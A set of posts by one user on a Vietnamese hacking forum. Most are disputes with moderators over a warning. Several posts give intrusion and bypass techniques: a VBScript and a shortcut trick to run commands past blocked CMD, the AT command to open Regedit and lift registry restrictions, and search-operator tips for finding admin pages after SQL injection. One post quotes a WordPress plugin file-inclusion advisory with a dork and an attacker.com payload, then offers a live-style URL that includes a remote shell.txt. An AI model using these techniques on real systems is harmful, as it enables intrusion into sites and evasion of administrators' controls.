|
|
Lưu ý để tránh nhưng người phá phách nhưng chưa thực sự ý thức và hiểu rõ vấn đề làm ơn lần sau đừng nên đưa shell lên như thế.
|
|
|
Theo cách bạn trình bày thì khi mở ra thì CMS sẽ phát hiện cửa sổ CMD mà close lại, vậy bạn hãy thử cách này nữa xem .
Tạo shortcut trong desktop, trong mục "type the localtion" ... gì đó gõ vào cmd.exe, sau đó nhấn next tới phần đặt tên thì gõ vào bất cứ thứ gì ... thử xem, cách này khá đơn giản lâu lắm rồi tôi đã có thử và qua mặt các chương trình bảo vệ khá dễ dàng )
Còn không bạn thực thi lệnh dos bằng cách viết một vbscript cho nó thực thi trực tiếp thử xem không cần phải mở command .. )
thử với đoạn script này:
Code:
'@ L0ng3ta
Result1 = Run("dir c:\windows")
MsgBox Result1
Function Run(strCommand)
Run = "Error"
Set obj1 = WScript.CreateObject("WScript.Shell")
Set obj2 = obj1.Exec("cmd /c " & strCommand)
If obj2.ProcessID = 0 And obj2.Status = 1 Then
Err.Raise vbObjectError,,"WshShell.Exec failed."
End If
Do While Not obj2.StdOut.AtEndOfStream
Dim Status: Status = obj2.Status
'Dim strText: StrText = obj2.StdOut.ReadAll()
'WScript.echo StrText
Dim strText: StrText = obj2.StdOut.ReadLine()
WScript.echo StrText
Loop
Run = strText
End Function
have fun.
|
|
|
Đê xem có đủ tiền làm một cái diễn đàn giống HVA không chứ chi mà pác conmale hỏi kỳ thế ..hehe )
|
|
|
@coiuminh: vậy là tôi hiểu lầm ý của bạn à !!! thế thì thật là tiết ), ủa mà tôi nhớ là đâu hề có cái topic nào của mình dạy cách tấn công web application gì đó đâu bạn ?? chắc là bạn lộn với ai rồi đó ) Nếu có bạn cho cái đường link xem sao ?
Còn ý bạn muốn tìm trang đăng nhập thường cách dễ nhất là sử dụng google search trực tiếp trên trang ấy dùng key "site" hoẵc "inurl" " "allinurl" hay "intitle" ... đại loại thế. Còn bác Gamma95 có đề cập đến xp_dirtree bác cũng nên xét tới.
Have fun.
|
|
|
coiuminh wrote:
Tức là mình dùng SQL injection và đã tìm ra username và password của admin từ địa chỉ : www. .asp?pr=345 nhưng đây là trang danh sách các sản fẩm chứ không phải trang của admin. Vay mình muốn tìm trang của admin dùng để update thông tin, xóa thông tin,..... của sản fẩm. Các bro chỉ dzùm mình nhá.... Thanks nhiều!
Để những người như thế này biết thì hại nhiều hơn là lợi,,, mà đã là SQL injection thì muốn update và xóa thông tin của sản phẩm cần gì phải tìm trang đăng nhập nhễ . ).
|
|
|
http://securityreason.com/securityalert/2660
Vulnerability:
~~~~~~~~~~~~~
- Invalid include function at wordtube-button.php :
----------------wordtube-button.php-------------------
...
*/
// get and set path of function
if (!$_POST) $wppath=$_GET['wpPATH'];
else $wppath=$_POST['wpPATH'];
require_once($wppath.'/wp-config.php');
require_once($wppath.'/wp-admin/admin.php');
...
----------------------------------------------------------------
Input passed to the "wpPATH" parameter in
wordtube-button.php is not properly verified before being used to
include files.
This can be exploited to include arbitrary files from local or
external resources.
Successful exploitation requires that
"register_globals" is enabled.
Poc/Exploit:
~~~~~~~~~
http://www.target.com/wp-content/plugins/wordtube/wordtube-button
.php?wpPATH=http://attacker.com/evil?
Google dork:
~~~~~~~~~
inurl:/plugins/wordtube
Solution:
~~~~~~
- Edit the source code to ensure that input is properly
verified.
- Turn off register_globals
- use the latest version
===================
cái này lâu rồi nhưng search lại vẫn dính đầy.
http://xxx.com/home/wp-content/plugins/wordtube/wordtube-button.php?wpPATH=http://sgstars.tripod.com/shell.txt?
@Đã sửa link ...sorry.
|
|
|
@rongxanh29
Trong bài viết có đề cập đến nhiều cách để can thiệp vào registry... nếu cách đó không được em hãy thử cách khác xem sao .
|
|
|
conmale wrote:
Tôi chỉ nói 1 lần nữa:
Bạn L0ng3ta cần phàn nàn thì nên tập trung vào phàn nàn. Đừng tiếp tục biến bất cứ topic nào cũng trở thành nơi chit chat. Nếu bạn tiếp tục, tôi không còn lựa chọn nào khác là lock account của bạn.
Còn việc ai mở topic ra thêm thắt gì đi chăng nữa những những thêm thắt ấy hữu lý và cần thiết thì rất nên làm. Ít ra, nên làm hơn những việc chit chat không cần thiết.
Xin lỗi pác ...tôi không hề muốn biến nơi này thành chỗ chít chát thứ hai ,,, Nếu tôi có ý định chit chat thì tôi thừa thông minh để mở topic trong mục khác kìa. Nhưng có những người cố tình vào đây chít chát chắc bác thấy rõ hơn tôi nhiều. Tôi chỉ trả lời lại với những lời chit chát đó mà thôi. Nếu bác nghiêm minh thì hãy xử những người đó trước kìa, tôi có lỗi, tôi chấp nhận nhận lỗi, không có gì là xấu hổ, và tôi đáng bị cảnh cáo. Chỉ sợ rằng ai đó có lỗi những không dám nhận lỗi thì mới là điều đáng nói.
Còn nếu như các pác trủ trì trong này có quyền làm việc mở một topic đã bị khóa và thêm thắc vào trong ấy và được các bác đồng tình thì tôi không còn gì để nói
Topic close.
|
|
|
conmale wrote:
L0ng3ta wrote:
Nhìn đi nhìn lại cuối cùng thì mình cũng bị 1 sẹo cảnh cáo ??? Và không ai khác đó chính là bác PXMMRF đỉnh cao trí tuệ nhà ta .. Quả là đoán không sai.
Nhưng cảnh cáo chỉ là chuyện nhỏ, không hề gì, nhưng tôi có thắc mắc là tại sao bác ấy lại warn mình hay những gì mình nói "thật đến độ" khó nghe đối với bác ấy ???
Rất cám ơn bác PXMMRF vì đã cho tôi thấy rõ bác. Một lần nữa xin cám ơn ) )
Người đời thường có một câu: "Quân tử khó kiếm chớ tiểu nhân thì đầy" ) )
Chỉ trong nội dung bài bày, bồ cũng đã đáng để bị cảnh cáo. Nếu bị cảnh cáo, bồ có quyền phản bác bằng cách chứng minh một cách hữu lý thay vì tiếp tục lặp lại cụm "đỉnh cao trí tuệ" kia. Bồ có thể nói thật nhưng bồ không nên sa đà và trong chủ đề đó, bồ đã sa đà rất nhiều lần.
Tôi có thể liệt kê ra ít nhất 10 chi tiết để có thể cảnh cáo bồ trong chủ đề chít chát kia. Ngay trong bài bồ bị cảnh cáo, bồ vẫn không bình tĩnh phản biện mà lại chụp cho người cảnh cáo bồ chơi trò 'vũ lực'.
Tôi xen vào chủ đề chít chát kia là có ý muốn kết thúc nó và làm dịu xuống mức căng thẳng không cần thiết. Tôi xin nhắc lại một lần nữa, diễn đàn HVA không phải là diễn đàn thảo luận về xã hội và chính trị. Những thảo luận mang tính chit chat, giải trí có thể tạm bỏ qua nếu nó dừng lại đúng lúc. Tuy nhiên, những thảo luận cố tình đẩy tới chỗ vi phạm nội quy, mọi thành viên, kể cả moderators vẫn bị cảnh cáo.
Hy vọng giải thích của tôi ở đây phần nào giải quyết thắc mắc của bồ.
Vậy là tôi đáng bị cảnh cáo trong chủ đề trước .... nếu đúng thế thì chẳng sao, nhưng tôi chỉ ngại là tôi bị cảnh cáo trong cái việc "nói thật vừa rồi"
À mà còn pác conmale nè ... trong "chủ chương" của diễn đàn chắc không hề có nói tới cái vụ chủ đề đã bị khóa mà ai đó có quyền vẫn được quyền mở ra và thêm thắt vào trong ấy chứ ???? Nếu có thì không còn gì để nói với các pác nữa )
|
|
|
huynhfxxx wrote:
bắt đầu có triệu chứng giống tôi rồi đó , tôi đang hồi phục
Chính ủy một lần nữa rất hoan hô tính thành khẩn của bác. Đợi câu nói này của bác cũng biết hồi đó bác bệnh nặng cỡ nào... Mà dạo này an ninh trong đó kém lắm hay sao mà để ra ngoài nhiều quá vậy ta ... Tôi trốn ra bằng cách leo hàng rào đó ,, còn bác đu giây điện trốn ra hả ???
|
|
|
huynhfxvn wrote:
ko hẳn là từ topic đó , đó chỉ là giọt nước làm tràn ly thôi , bác nên tự kiểm điểm chính mình .
Xin lỗi pác huynhxxx bác hiểu được mấy phần trong đó mà bác nói ... Nếu bác hiểu phần nào bác vui lòng nói ra cho anh em cùng biết ??
|
|
|
Lại là anh huynhxxx gì đó .,... cám ơn bác đã biện hộ giùm cho hành động "phát sít" đó ...Một lần nữa cám ơn pác.. ) )
Và đây là nội dung mà tôi bị cảnh cáo:
/hvaonline/posts/list/12537.html
Còn muốn biết tôi nói đúng hay sai hãy cứ xem ngày giờ gởi của các bài post thì sẽ rõ.
Sự thật lúc nào cũng là sự thật, dù ai đó cố tình che dấu nó thì một ngày nào đó mọi người rồi cũng nhận ra đúng bản chất của nó.
|
|
|
Nhìn đi nhìn lại cuối cùng thì mình cũng bị 1 sẹo cảnh cáo ??? Và không ai khác đó chính là bác PXMMRF đỉnh cao trí tuệ nhà ta .. Quả là đoán không sai.
Nhưng cảnh cáo chỉ là chuyện nhỏ, không hề gì, nhưng tôi có thắc mắc là tại sao bác ấy lại warn mình hay những gì mình nói "thật đến độ" khó nghe đối với bác ấy ???
Rất cám ơn bác PXMMRF vì đã cho tôi thấy rõ bác. Một lần nữa xin cám ơn ) )
Người đời thường có một câu: "Quân tử khó kiếm chớ tiểu nhân thì đầy" ) )
|
|
|
Tại thời điểm này trong khi tôi không thể gởi reply của mình vào đúng nơi cần gởi vì topic đã bị khóa nên phải gởi nhờ tại đây thì có anh quản trị nào đó chắc là đang cay cú đã cố tình vi phạm luật chơi dùng quyền lực của mình mở lại topic để cố gắn nhét vào một cái reply cuối cùng coi như là để vớt vát tý gì đó.
Tôi xin nói với mấy anh quản trị đó một câu thế này: Nếu mấy anh muốn mọi người thực sự nể phục và tuân thủ luật chơi do các anh đặc ra thì các anh chính là người phải tuân thủ luật chơi ấy và đừng nên làm trò con nít ấy nữa nhé.
Đôi lời.
|
|
|
Vừa mới online thấy cái topic cũ đã bị đóng, sẵn tiện topic này của bạn tôi cũng muốn được nói đôi lời tới bác conmale:
conmale wrote:
Tôi có vài ý kiến:
1) Khi trao đổi và cần quote (trích) lời của ai đó, nên giữ nguyên tên của người trích. Không nên biến nó thành một cái tên khác để mang tính chế diễu
Ví dụ: L0ng3ta quote lời của PXMMRF và biến nó thành đỉnh cao trí tuệ. Tôi cho rằng làm như thế là cố tình mạ lị, thiếu chuyên nghiệp, thiếu lịch sự.
Ý này của bác tôi xin chấp nhận, quả là trong lúc cao hứng nên không để ý vì tôi nghĩ rằng điều ấy không lấy gì làm nghiêm trọng cho lắm vì dù gì cũng là anh em một nhà, vả lại mọi người cũng đều lấy nick ra và đùa chơi một chút cho nên tôi đã thực sự không nghĩ tới việc làm đó của mình khiến cho một số anh em nóng mặt. Nếu có xúc phạm đến ai đó tôi xin thành thật xin lỗi.
conmale wrote:
2) Nếu cần tranh luận, nên tranh luận bằng ngôn từ và lý lẽ một cách chính xác và khoa học, đừng nên lạm dụng từ ngữ và vận dụng đến các tiểu xảo để phản bác.
Cái này tôi có một chút bân khuân. Nếu như đã là tranh luận trong diễn đàn nếu không vận dụng "từ ngữ " thì vận dụng cái gì? và tôi xin nói rõ một điều là tôi không hề dùng tiểu xảo gì để phản bác ai cả. Tôi chỉ dùng lý lẽ và lập luận của người khác mà phản bác lại chính họ.
conmale wrote:
3) Diễn đàn đã có quy định rất rõ ràng về các trao đổi mang tính chính trị, tôn giáo... Bởi thế, nên tôn trọng những điều moderators nhắc nhở và đừng nên tự ái khi bị nhắc nhở.
Tôi không tự ái, chỉ sợ ai đó tự ái rồi đem vũ lực ra nói chuyện với tôi. Nếu thực sự đúng thì hãy dùng các lý lẽ đúng của mình mà phản bác. .. Đừng chơi trò con nít đó ở đây.
Tóm lại chỉ là đôi lời, nhưng dù gì topic đó đã được đóng lại nên tôi cũng không muốn nói gì thêm nhiều về các tranh luận ở đó.
Thân chào.
|
|
|
mới test sơ mấy cái ra lỗi này rồi :
Code:
Could not obtain information. Line: 133, D:\Websites\tongoclanvn\khoaigia\hlink.vn\web\pc\pages\hl_viewdetail.php, INSERT INTO hl_viewproducts(VP_IPCUSTOMER,VP_P_ID,VP_DATEVIEW,VP_TYPE) VALUES('165.228.130.12',8873423423423432,now(),1)
|
|
|
Nokia1100 wrote:
Em cũng dịch ra đc như thế. Nhưng tại sao lại phải nhập vào dưới dạng dec của ký tự trong bảng ASCII thế này vậy
Một câu trả lời rất đơn giản là vì không muốn cho mọi người dễ dàng "nhìn thấy" .. )
|
|
|
Cũng lại là topic của bác huynhxxx, tôi thì tôi nghi bác ấy lâu lắm rồi ... heheh ) )
|
|
|
Chỉ thì chỉ cũng được cho bác đó ... nhưng sợ chỉ rồi bác không hiểu thì lại hỏi tiếp quá.. nhưng không sao )
Trong notepad bác gõ dòng sau:
echo anh yeu em > c:\tho.txt
sau đó lưu với tên là thoconcoc.bat
sau đó chạy cái thoconcoc.bat đó thì bác sẽ thấy ổ C:\ sẽ có tệp tin tho.txt được tạo ra.
nếu muốn hiểu rõ vấn đề tốt nhất bạn nên tìm hiểu sơ về các lệnh của dos và về batch file. )
|
|
|
southVN wrote:
quote:
"Bạn sẽ làm như sau: ví dụ giờ của hệ thống đang là 10:30AM
_Mở Start ==> Run ==> cmd
_Từ dấu nhắc dos gõ lệnh: At 10:31AM /interactive Registry
_Sau đó ngồi chờ đúng 10:31 thì Registry Editor sẽ hiện lên.
_Vào HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System
và đổi giá trị cho key DisableRegistryTools ==> dword=00000000 thế là xong, quá đơn giản phải không? "
ủa sao làm theo lệnh thì nó lại không lên. CHỉ thấy như sau:
C:\Documets and Settings>At 10:10AM /interactive Registry
Added a new job with job ID = 1
Vậy là sao??
Sửa lại là :
At 10:10AM /interactive Regedit
Vậy cứ đợi đúng 10:10AM thì Regedit sẽ kích hoạt
|
|
|
Ý tưởng hay ... nhưng hơi củ ... bởi vì nhiều khi đọc các bài của huynhfx tôi muốn sử dụng cái emoti. cười lăn cười bò nhưng không biết phải lấy ở đâu .. đành phải mượn tạm chỗ khác nhiều khi cũng mắc công lắm chứ bộ ... )
|
|
|
Bạn có nghĩ là bạn lợi dụng lòng tốt của người khác nhiều không ? Vấn đề là của bạn, giúp bạn cũng có một giới hạn, bạn cứ hỏi tới như thế thì ai rãnh ở không giúp bạn, người khác cũng có công việc của họ ??? trong khi bạn chưa thể hiện thành ý tự tìm hiểu của mình ?? Conmale còn dễ dãi lắm đấy. Ít ra tôi phải đợi ít nhất là 2 ngày nữa mới trả lời câu tiếp theo.
Có người lại biện minh là diễn đàn là nơi để trao đổi và học hỏi. Nên tôi có quyền hỏi. Vậy cứ việc hỏi.. Khi rãnh tức sẽ có người trả lời.
Như tôi bây giờ tôi muốn làm bác sĩ, ai chỉ tôi với ...blalala ..Bạn có thấy nhảm hay không ??? những gì mình không biết hoặc không hiểu thì phải học, mà học không nổi thì thôi, còn học nổi mà còn khuất mắt chỗ nào thì mới hỏi, mà hỏi cũng phải hỏi có giới hạn thôi ..,.
Tôi đã đọc cả 2 topic của bạn về vấn đề này và đều thấy rằng conmale rất nhiệt tình giúp bạn. Bạn còn muốn sao nữa ?? hay là "được voi đòi 2 bà trưng"
|
|
|
Không biết mọi người nghe nói đến lệnh AT có thể chạy với quyền system chưa? Nếu chưa thì xem thử cách đó có giúp gì không ?
|
|
|
Nếu là phòng game thì chỉ có một chiêu duy nhất: Ghost )
|
|